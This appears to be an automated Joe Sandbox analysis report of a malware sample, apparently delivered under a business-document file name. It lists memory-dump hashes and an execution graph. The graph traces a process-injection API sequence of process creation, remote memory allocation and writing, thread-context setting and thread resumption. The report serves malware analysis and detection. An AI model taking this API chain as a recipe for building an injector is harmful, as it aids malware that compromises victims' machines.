                                          • Instruction ID: fea41193cf168b44cf5d4db2e903f63f4632292662bc9eb319816b16d9a4eb20
                                          • Opcode Fuzzy Hash: b57c37bda7ed3a79964666605ec613c546a86b42d57d614aa14a82324657712e
                                          • Instruction Fuzzy Hash: 6DE0C2310083864FC703FB30E8691447F3ABA83100B8890A1D0864F19ADEB8588A8BB6
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 64e1d8abdcdef3ffe3280b23fc147037ebb394bd77e3d440719de95990031a88
                                          • Instruction ID: 034c8a2cae2ee2499fa68ac0a0a71dc3274c77a784eff7fe68298372ce68e78a
                                          • Opcode Fuzzy Hash: 64e1d8abdcdef3ffe3280b23fc147037ebb394bd77e3d440719de95990031a88
                                          • Instruction Fuzzy Hash: 11E0C231D2032B9ACB249BB4D8084FEFF34FED2310B608267D4103A000EB30265AC7A0
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1bab43ffa149fe91ae90cddce7980e88b1514653df4450b177c70e4e211466d5
                                          • Instruction ID: 5173bff55ec8661dcf84086ce029f384702e65dc4f64c9eecc6a0c168bdb71ed
                                          • Opcode Fuzzy Hash: 1bab43ffa149fe91ae90cddce7980e88b1514653df4450b177c70e4e211466d5
                                          • Instruction Fuzzy Hash: 76D01231D2032A978B10A6A5DC044EEBB38EE95221B504626D51437144EB70665986A1
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: df21cc55b6400f258d138ddca6ff5ee9fd5d574ca978cd709cade312e8362649
                                          • Instruction ID: cb6290d9dd2f920f5e45d697778e2067dda93e81af9c81d8b813ae1a4a09c653
                                          • Opcode Fuzzy Hash: df21cc55b6400f258d138ddca6ff5ee9fd5d574ca978cd709cade312e8362649
                                          • Instruction Fuzzy Hash: 18D0E235E0010CCFCB30DFA8E4844DCFB70EB4D321B10942AE825A3202D63428518F11
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2d3c5a6f58b2792f201b60715fa4070a5a4028a2a6dfb537289a273c4fe5d370
                                          • Instruction ID: 4bacffa6be7092e3a673fdac12a80c171f34e3b8f118e66266129a9789d96647
                                          • Opcode Fuzzy Hash: 2d3c5a6f58b2792f201b60715fa4070a5a4028a2a6dfb537289a273c4fe5d370
                                          • Instruction Fuzzy Hash: C7D0677AB000089FCB149F98E8409DDF776FB98221B048117E915A3264C6319925DB50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c04fbad1d1901ca5cd506767386fc5e1501e48e1018730250d79641dd14988f9
                                          • Instruction ID: 1bf96ea41140b6613a2e63f53c9f44f18006e44a4662754b862af2f6a5832731
                                          • Opcode Fuzzy Hash: c04fbad1d1901ca5cd506767386fc5e1501e48e1018730250d79641dd14988f9
                                          • Instruction Fuzzy Hash: 9BC080710103194FD501F771FC56655336E76C1500780D520D0C60975DEEF9A8894FB5
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dd4efd096b9044481574fb23e013059d043c3a4281d60cdafa7a2233488ab655
                                          • Instruction ID: c1bad985e1c52261f3b42c93e058f613ebeb3ee8d8c957bb66147c5602f01646
                                          • Opcode Fuzzy Hash: dd4efd096b9044481574fb23e013059d043c3a4281d60cdafa7a2233488ab655
                                          • Instruction Fuzzy Hash: AC528A74E01229CFDB64DF65C884B9EBBB2BB89300F5081EAD449A7358DB359E85CF50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 78dad0cc97b6f492485f22d5ddf1492a02a3d4de395d8e7ea2c647806fff8731
                                          • Instruction ID: d2c1c99e5de7cd8a2d63f0fe82baf2a16a997d149349c9c585a748d46cf0a24c
                                          • Opcode Fuzzy Hash: 78dad0cc97b6f492485f22d5ddf1492a02a3d4de395d8e7ea2c647806fff8731
                                          • Instruction Fuzzy Hash: 58C1D074E01219CFDB54DFA5C894B9DBBB2BF89300F6081A9D849AB358DB359E81CF50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7316a399d2618e42ec936b2fad4e8337740159ddb087233d036c3ea3d23e37e6
                                          • Instruction ID: dfae6248c071baf9c11c9bffc6cf20c10ced77aeecfbbf54cb44b8d1538a1757
                                          • Opcode Fuzzy Hash: 7316a399d2618e42ec936b2fad4e8337740159ddb087233d036c3ea3d23e37e6
                                          • Instruction Fuzzy Hash: 0BC1C174E01229CFDB54DFA5C994B9DBBB2BF89300F6081A9D409AB358DB359E81CF50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c5dada86dc22c9e87966f65f1ec3a0c9de3a8b7ab5150a5790037f32054b3237
                                          • Instruction ID: 5dc948464d1f41fc777575758444ec24f2cabd984c93756ed01399d38b74c013
                                          • Opcode Fuzzy Hash: c5dada86dc22c9e87966f65f1ec3a0c9de3a8b7ab5150a5790037f32054b3237
                                          • Instruction Fuzzy Hash: C3C1D074E01228CFDB54DFA5C994B9DBBB2BF89300F6081A9D409AB358DB359E85CF50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d389f6a48ec0817655a674ced64a8c3ddc990ba031d643230ce2473fbdde52ef
                                          • Instruction ID: 954c467d79eba1be10ea964145a27116e63e6645b2f15b1fa38052f50d6e296d
                                          • Opcode Fuzzy Hash: d389f6a48ec0817655a674ced64a8c3ddc990ba031d643230ce2473fbdde52ef
                                          • Instruction Fuzzy Hash: 78C1D074E01228CFDB54DFA5C994B9DBBB2BF89300F6080A9D409AB358DB359E81CF10
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52436751e1ed603a7d05ba2eab79923f58e491b94c90ce35039fd9a78e501c81
                                          • Instruction ID: a5493046ea7af9cd2f2f702d5c59bc779251be7c7ede19169da7385ce348c3ca
                                          • Opcode Fuzzy Hash: 52436751e1ed603a7d05ba2eab79923f58e491b94c90ce35039fd9a78e501c81
                                          • Instruction Fuzzy Hash: 89C1C274E01229CFDB54DFA5C994B9DBBB2BF89300F6081A9D409AB358DB359E81CF50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 49c115fccb9f158e24c2b8b440b07edd0ab251fc3aee2939e25da37878432a4d
                                          • Instruction ID: 6d5d1c254144538d12d5ee3c5970f606f2ebfb5e9e4ea9944a026bf1389d8a5e
                                          • Opcode Fuzzy Hash: 49c115fccb9f158e24c2b8b440b07edd0ab251fc3aee2939e25da37878432a4d
                                          • Instruction Fuzzy Hash: F9C1DF74E01228CFDB54DFA5C894B9DBBB2BF89300F2080A9D409AB358DB349E85CF50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ef70f363d70d01f13487faeb8032c71155cc65dec7eac72fd2c757a91280f4d5
                                          • Instruction ID: f68d91110f141ca5014d8a8f92c6f5c01f74e809237156feb12fa60ae29f6095
                                          • Opcode Fuzzy Hash: ef70f363d70d01f13487faeb8032c71155cc65dec7eac72fd2c757a91280f4d5
                                          • Instruction Fuzzy Hash: 7FC1C174E01218CFDB94DFA5C994B9DBBB2BF89300F6081A9D409AB358DB359E85CF50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 812bfa0bde2a00ab757975f374a0ce3863686253e7d36492180aee878b3b91a0
                                          • Instruction ID: f4596723d18fdfae7775f77841778c06a2f5b6d8f00a44ef31e3f7f582dd6790
                                          • Opcode Fuzzy Hash: 812bfa0bde2a00ab757975f374a0ce3863686253e7d36492180aee878b3b91a0
                                          • Instruction Fuzzy Hash: A6C1C174E01228CFDB54DFA5C994B9DBBB2BF89300F6081A9D409AB358DB359E85CF50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: adb7b82e13d0497667cb9c86662c349d4d2ca2ca0c37c3a87408b1c9e5d3a9ed
                                          • Instruction ID: 693fc2521da0aed30b9c056c30fef717552297d03bd43dae447397f50375a354
                                          • Opcode Fuzzy Hash: adb7b82e13d0497667cb9c86662c349d4d2ca2ca0c37c3a87408b1c9e5d3a9ed
                                          • Instruction Fuzzy Hash: 75C1C274E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB358DB359E85CF50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 42791232c25ab75983692c46c01726eef9b9fb51e3dd509f7a74521c3a0e194f
                                          • Instruction ID: 372d655e066ad2f157ec15ef88bd36817f1c5c86eba02859192922632d142d01
                                          • Opcode Fuzzy Hash: 42791232c25ab75983692c46c01726eef9b9fb51e3dd509f7a74521c3a0e194f
                                          • Instruction Fuzzy Hash: 88C1D274E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB758DB359E85CF50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6dbeede7fdd368a0cf9a6c7d8878d2fc0676eb1494b748c0eea307a790ce1e3c
                                          • Instruction ID: 6ceaa1d85405270a28e4539bf2f6cc20f933fe969de7b19aca1f84607902771c
                                          • Opcode Fuzzy Hash: 6dbeede7fdd368a0cf9a6c7d8878d2fc0676eb1494b748c0eea307a790ce1e3c
                                          • Instruction Fuzzy Hash: 6AC1C178E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB358DB359E85CF50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7fb343b49578bd36df58a61922e58bf90ec8bc0723981451f93580c1f0b8fe87
                                          • Instruction ID: 0b181bd48344d0b951dd24085d6d4e1bd2fe36c1e4784e81a4aa484cb1aa7560
                                          • Opcode Fuzzy Hash: 7fb343b49578bd36df58a61922e58bf90ec8bc0723981451f93580c1f0b8fe87
                                          • Instruction Fuzzy Hash: 78A19D74A01228CFDB64DF64C894B9ABBB2BF89300F5085EAD449A7354DB319E81CF51
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 94861d35516a8909aad7c60a892016629491ff7c2785e273b6515a04d4557e64
                                          • Instruction ID: 366678204a2dea7c6a3c92106ac7ea70109e6e469f380801426f03be37ae1178
                                          • Opcode Fuzzy Hash: 94861d35516a8909aad7c60a892016629491ff7c2785e273b6515a04d4557e64
                                          • Instruction Fuzzy Hash: 31512571D0120ACBEB04EFE8D5447EEBBB2BB89300F94C169D494BB298DB759885CF54
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 690005c4b32244a4ebc8e23a69de419e318be78061cc2223b3d236b3c8901645
                                          • Instruction ID: 215d045119bcb0250a26689da066d02e83a4924d8f144c7fc624cfb28fca0a14
                                          • Opcode Fuzzy Hash: 690005c4b32244a4ebc8e23a69de419e318be78061cc2223b3d236b3c8901645
                                          • Instruction Fuzzy Hash: 9951F275D0120ACFDB14EFE8D484BEDBBB2FB49300FA48169D595AB294CB369881CF54
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8bc242e38f8c55e505f0d222dfcd76dec57a2b89887ffc8a3f761236631a644f
                                          • Instruction ID: 292978178840baa847ea5e388e63f1c43736a5d3cf1140fae89e8a0277e4d1f6
                                          • Opcode Fuzzy Hash: 8bc242e38f8c55e505f0d222dfcd76dec57a2b89887ffc8a3f761236631a644f
                                          • Instruction Fuzzy Hash: 2D51A174A01229CFDB64DF64D854BAABBB2FF4A301F5085E9D40AA7354DB319E81CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \;q$\;q$\;q$\;q
                                          • API String ID: 0-2933265366
                                          • Opcode ID: c4fe4cfb9c8242e00397ce4f47d176e268c57c86f36679786c5f7dcf722a6ab6
                                          • Instruction ID: 5a59e7214eefdba3acc2c51ceda1a5db477a7eb4923c9fa574e088e63a98315a
                                          • Opcode Fuzzy Hash: c4fe4cfb9c8242e00397ce4f47d176e268c57c86f36679786c5f7dcf722a6ab6
                                          • Instruction Fuzzy Hash: 8601F2327005048FC7608EACC454AA937FEBF8876276D41AAE586CB371DE32DC418B40

                                          Execution Graph

                                          Execution Coverage:10.3%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:183
                                          Total number of Limit Nodes:12
                                          execution_graph 25483 764b527 25484 764b4c3 25483->25484 25485 764b706 25484->25485 25489 764c83e 25484->25489 25505 764c7d1 25484->25505 25520 764c7e0 25484->25520 25490 764c841 25489->25490 25491 764c7cc 25489->25491 25490->25485 25535 764cd9b 25491->25535 25540 764ccca 25491->25540 25545 764cf3a 25491->25545 25550 764cc7a 25491->25550 25555 764d018 25491->25555 25564 764cbdf 25491->25564 25568 764cd6e 25491->25568 25577 764cf12 25491->25577 25585 764cf91 25491->25585 25594 764cd30 25491->25594 25598 764cc34 25491->25598 25603 764d2d4 25491->25603 25492 764c81e 25492->25485 25506 764c7d4 25505->25506 25508 764d2d4 2 API calls 25506->25508 25509 764cc34 2 API calls 25506->25509 25510 764cd30 2 API calls 25506->25510 25511 764cf91 4 API calls 25506->25511 25512 764cf12 4 API calls 25506->25512 25513 764cd6e 4 API calls 25506->25513 25514 764cbdf 2 API calls 25506->25514 25515 764d018 4 API calls 25506->25515 25516 764cc7a 2 API calls 25506->25516 25517 764cf3a 2 API calls 25506->25517 25518 764ccca 2 API calls 25506->25518 25519 764cd9b 2 API calls 25506->25519 25507 764c81e 25507->25485 25508->25507 25509->25507 25510->25507 25511->25507 25512->25507 25513->25507 25514->25507 25515->25507 25516->25507 25517->25507 25518->25507 25519->25507 25521 764c7e3 25520->25521 25523 764d2d4 2 API calls 25521->25523 25524 764cc34 2 API calls 25521->25524 25525 764cd30 2 API calls 25521->25525 25526 764cf91 4 API calls 25521->25526 25527 764cf12 4 API calls 25521->25527 25528 764cd6e 4 API calls 25521->25528 25529 764cbdf 2 API calls 25521->25529 25530 764d018 4 API calls 25521->25530 25531 764cc7a 2 API calls 25521->25531 25532 764cf3a 2 API calls 25521->25532 25533 764ccca 2 API calls 25521->25533 25534 764cd9b 2 API calls 25521->25534 25522 764c81e 25522->25485 25523->25522 25524->25522 25525->25522 25526->25522 25527->25522 25528->25522 25529->25522 25530->25522 25531->25522 25532->25522 25533->25522 25534->25522 25536 764cca3 25535->25536 25607 764aa40 25536->25607 25611 764aa39 25536->25611 25537 764d1a5 25542 764d258 25540->25542 25541 764d40b 25615 764a950 25542->25615 25619 764a949 25542->25619 25546 764d321 25545->25546 25548 764a950 WriteProcessMemory 25546->25548 25549 764a949 WriteProcessMemory 25546->25549 25547 764d14a 25547->25492 25548->25547 25549->25547 25551 764cca3 25550->25551 25553 764aa40 ReadProcessMemory 25551->25553 25554 764aa39 ReadProcessMemory 25551->25554 25552 764d1a5 25553->25552 25554->25552 25557 764cd1b 25555->25557 25556 764d50f 25556->25492 25557->25556 25558 764cfb0 25557->25558 25623 7649e90 25557->25623 25627 7649e98 25557->25627 25631 764a380 25558->25631 25635 764a379 25558->25635 25559 764d0df 25639 764afcc 25564->25639 25643 764afd8 25564->25643 25571 764cd1b 25568->25571 25569 764cfb0 25573 764a380 Wow64SetThreadContext 25569->25573 25574 764a379 Wow64SetThreadContext 25569->25574 25570 764d0df 25571->25568 25571->25569 25572 764d50f 25571->25572 25575 7649e90 ResumeThread 25571->25575 25576 7649e98 ResumeThread 25571->25576 25572->25492 25573->25570 25574->25570 25575->25571 25576->25571 25579 764cd1b 25577->25579 25578 764cfb0 25581 764a380 Wow64SetThreadContext 25578->25581 25582 764a379 Wow64SetThreadContext 25578->25582 25579->25578 25580 764cf26 25579->25580 25583 7649e90 ResumeThread 25579->25583 25584 7649e98 ResumeThread 25579->25584 25580->25492 25581->25580 25582->25580 25583->25579 25584->25579 25586 764cfb0 25585->25586 25588 764cd1b 25585->25588 25592 764a380 Wow64SetThreadContext 25586->25592 25593 764a379 Wow64SetThreadContext 25586->25593 25587 764d0df 25588->25586 25589 764d50f 25588->25589 25590 7649e90 ResumeThread 25588->25590 25591 7649e98 ResumeThread 25588->25591 25589->25492 25590->25588 25591->25588 25592->25587 25593->25587 25596 764a380 Wow64SetThreadContext 25594->25596 25597 764a379 Wow64SetThreadContext 25594->25597 25595 764cd4f 25595->25492 25596->25595 25597->25595 25599 764cc3d 25598->25599 25599->25598 25647 764a890 25599->25647 25651 764a888 25599->25651 25600 764cf7b 25605 764a950 WriteProcessMemory 25603->25605 25606 764a949 WriteProcessMemory 25603->25606 25604 764d302 25605->25604 25606->25604 25608 764aa43 ReadProcessMemory 25607->25608 25610 764aacf 25608->25610 25610->25537 25612 764aa3c ReadProcessMemory 25611->25612 25614 764aacf 25612->25614 25614->25537 25616 764a953 WriteProcessMemory 25615->25616 25618 764a9ef 25616->25618 25618->25541 25622 764a94c WriteProcessMemory 25619->25622 25621 764a9ef 25621->25541 25622->25621 25624 7649e97 ResumeThread 25623->25624 25626 7649efd 25623->25626 25624->25626 25626->25557 25628 7649ed8 ResumeThread 25627->25628 25630 7649efd 25628->25630 25630->25557 25632 764a383 Wow64SetThreadContext 25631->25632 25634 764a40d 25632->25634 25634->25559 25636 764a37c Wow64SetThreadContext 25635->25636 25638 764a40d 25636->25638 25638->25559 25640 764afd0 CreateProcessA 25639->25640 25642 764b223 25640->25642 25642->25642 25644 764afdb CreateProcessA 25643->25644 25646 764b223 25644->25646 25646->25646 25648 764a893 VirtualAllocEx 25647->25648 25650 764a90d 25648->25650 25650->25600 25652 764a88c VirtualAllocEx 25651->25652 25654 764a90d 25652->25654 25654->25600 25688 764d910 25689 764da9b 25688->25689 25691 764d936 25688->25691 25691->25689 25692 764ac80 25691->25692 25693 764db90 PostMessageW 25692->25693 25694 764dbfc 25693->25694 25694->25691 25655 30647c0 25656 30647c9 25655->25656 25657 30647cf 25656->25657 25659 30648b9 25656->25659 25660 30648c7 25659->25660 25661 30648e7 25659->25661 25664 3064dd0 25660->25664 25668 3064dc1 25660->25668 25661->25657 25665 3064dd5 25664->25665 25667 3064ed4 25665->25667 25672 3064a60 25665->25672 25667->25661 25669 3064dc9 25668->25669 25670 3064a60 CreateActCtxA 25669->25670 25671 3064ed4 25669->25671 25670->25671 25671->25661 25673 3065e60 CreateActCtxA 25672->25673 25675 3065f23 25673->25675 25676 306d7c0 25677 306d7c5 GetCurrentProcess 25676->25677 25679 306d851 25677->25679 25680 306d858 GetCurrentThread 25677->25680 25679->25680 25681 306d895 GetCurrentProcess 25680->25681 25682 306d88e 25680->25682 25683 306d8cb 25681->25683 25682->25681 25684 306d8f3 GetCurrentThreadId 25683->25684 25685 306d924 25684->25685 25695 306b430 25698 306b519 25695->25698 25696 306b43f 25699 306b539 25698->25699 25700 306b55c 25698->25700 25699->25700 25706 306b7c0 25699->25706 25710 306b7b1 25699->25710 25700->25696 25701 306b554 25701->25700 25702 306b760 GetModuleHandleW 25701->25702 25703 306b78d 25702->25703 25703->25696 25707 306b7c5 25706->25707 25709 306b7f9 25707->25709 25714 306b238 25707->25714 25709->25701 25712 306b7c0 25710->25712 25711 306b7f9 25711->25701 25712->25711 25713 306b238 LoadLibraryExW 25712->25713 25713->25711 25715 306b9a0 LoadLibraryExW 25714->25715 25717 306ba19 25715->25717 25717->25709 25686 306da08 DuplicateHandle 25687 306da9e 25686->25687

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 526 306d7b0-306d7bc 527 306d7be 526->527 528 306d80d-306d84f GetCurrentProcess 526->528 529 306d7c5-306d808 527->529 530 306d7c0-306d7c4 527->530 533 306d851-306d857 528->533 534 306d858-306d88c GetCurrentThread 528->534 529->528 530->529 533->534 535 306d895-306d8c9 GetCurrentProcess 534->535 536 306d88e-306d894 534->536 538 306d8d2-306d8ed call 306d992 535->538 539 306d8cb-306d8d1 535->539 536->535 542 306d8f3-306d922 GetCurrentThreadId 538->542 539->538 543 306d924-306d92a 542->543 544 306d92b-306d98d 542->544 543->544
                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 0306D83E
                                          • GetCurrentThread.KERNEL32 ref: 0306D87B
                                          • GetCurrentProcess.KERNEL32 ref: 0306D8B8
                                          • GetCurrentThreadId.KERNEL32 ref: 0306D911
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: a58340db7703c5d7ea74b3caadfc588be3f3555fa37d7af61f41944fb8e9e446
                                          • Instruction ID: 611cdec26b7382573bd3cca5d94aed2604e6c0656db648dd330626afad2b1ab8
                                          • Opcode Fuzzy Hash: a58340db7703c5d7ea74b3caadfc588be3f3555fa37d7af61f41944fb8e9e446
                                          • Instruction Fuzzy Hash: BA5189B0E013498FEB14CFA9D948BEEBBF1EF48304F248469E019AB3A4D7755944CB65

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 551 306d7c0-306d84f GetCurrentProcess 556 306d851-306d857 551->556 557 306d858-306d88c GetCurrentThread 551->557 556->557 558 306d895-306d8c9 GetCurrentProcess 557->558 559 306d88e-306d894 557->559 561 306d8d2-306d8ed call 306d992 558->561 562 306d8cb-306d8d1 558->562 559->558 565 306d8f3-306d922 GetCurrentThreadId 561->565 562->561 566 306d924-306d92a 565->566 567 306d92b-306d98d 565->567 566->567
                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 0306D83E
                                          • GetCurrentThread.KERNEL32 ref: 0306D87B
                                          • GetCurrentProcess.KERNEL32 ref: 0306D8B8
                                          • GetCurrentThreadId.KERNEL32 ref: 0306D911
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: 88caeb03c34de402578e0f4a363422b79c4cf0f8e49e6e619c7bb7271b195338
                                          • Instruction ID: 3f154ebdd1a26f0b934d8f1e3ea54ba6dd18f4c99ccc5e7c182095da5e2250c6
                                          • Opcode Fuzzy Hash: 88caeb03c34de402578e0f4a363422b79c4cf0f8e49e6e619c7bb7271b195338
                                          • Instruction Fuzzy Hash: 7C5158B0D013498FEB14CFAAD548BDEBBF1EF48304F24C469E419A72A0D7755944CB65

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
